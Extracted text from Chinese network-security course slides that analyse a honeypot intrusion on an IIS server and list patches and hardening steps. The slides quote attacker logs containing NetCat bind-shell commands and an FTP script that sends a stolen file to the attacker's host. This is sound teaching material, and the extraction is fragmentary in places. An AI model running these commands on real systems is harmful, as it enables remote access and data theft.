课程5-Windows攻击技术及防御方法 pub课件.ppt

* * * * * * * 问题3: 闲逛(寻找有价值信息)+炫耀 攻击者又创建了2个NetCat监听服务，并在新的6868端口连入，但奇怪的是攻击者换了个IP地址56。 21:16:41 X:2002 - T:80 exec (unicode) nc -l -p 6968 -e cmd1.exe 21:19:05 X:2007 - T:80 exec (unicode) nc -l -p 6868 -e cmd1.exe 21:20:44 Y:1345 - T:6868 incoming NC cmd.exe: ./log/06/SESSION:6868-1345 闲逛：对蜜罐主机上exploits目录体现了特别兴趣 21:25:03 Y:1345 - T:6868 types echo best honeypot ive seen till now :) rfp.txt 21:25:49 X:2022 - T:80 view (unicode): boot.ini and READ.NOW.hax0r 21:26:06 X:2023 - T:80 view (unicode): READ.me.NOW.hax0r 炫耀：Web根目录创建了test.txt文件，象征性修改首页” echo . default.htm” 21:36:02 X:2091 - T:80 get /test.txt, result “this can‘t be true” 21:34、8 21:37、42 21:38、10 21:38、96 21:39、 86 21:39、 21:39、3 21:42、07 21:44、3 21:46、 21:52、6 21:56、7 21:59、20 22:18 * 网络攻防技术与实践课程 Copyright (c) 2008－2009 诸葛建伟 * 问题3: Cleanup+”顺手牵羊” 21:50:27 X:2150 - T:80 exec(unicode): copy c:\winnt\system32\cmd.exe cmd1.exe 21:50:37 X:2151 - T:80 exec(unicode): construct ftp script ftpcom ? ftpcom open X johna2k haxedj00 put c:\wiretrip\whisker.tar.gz quit ftpcom ? 21:51:29 X:2177 - T:80 exec (unicode): ftp -s:ftpcom 21:51:29 T:3158 - X:21 ftp transfer of stolen whisker, ascii 21:54:13 X:2187 - T:80 exec (unicode) del ftpcom * 网络攻防技术与实践课程 Copyright (c) 2008－2009 诸葛建伟 * 问题4-如何防止这样的攻击? 直接防御措施：打补丁 Unicode - /technet/security/bulletin/ms00-057.asp RDS - /technet/security/Bulletin/MS02-065.mspx 进一步防御措施：IIS安全防范措施 1. 为这些漏洞打上补丁 2. 禁用用不着的RDS等服务 3. 防火墙封禁网络内部服务器发起的连接 4. 为web server在单独的文件卷上设置虚拟根目录 5. 使用NTFS文件系统，因为FAT几乎不提供安全功能 6. 使用IIS Lockdown 和 URLScan 等工具加强web server Now: Update to IIS v6.x or switch to latest Apache * 网络攻防技术与实践课程 Copyright (c) 2008－2009 诸葛建伟 * 问题5-攻击者是否警觉了他的目标是一台蜜罐主机？ 是的，攻击者绝对意识到了他的目标是作为蜜罐主机的. 1. 因为他建立了一个文件，并输入了如下内容C:\echo best honeypot ive seen till now :) rfp.txt. 2. 因为该目标主机作为rfp的个人网站，Web服务所使用的IIS甚至没有更新rfp自己所发现的MDAC RDS安全漏洞，很容易让攻击者意识到这绝对是台诱饵。 * 网络攻防技术与实践课程 Copyright (c) 2008－2009 诸葛建伟 * * 网络攻防技术与实践课程 Copyright (c) 2008－2009 诸葛建伟 * 内容 Windows系统查点 Windows系统远程攻击 Windows系统本地攻击 案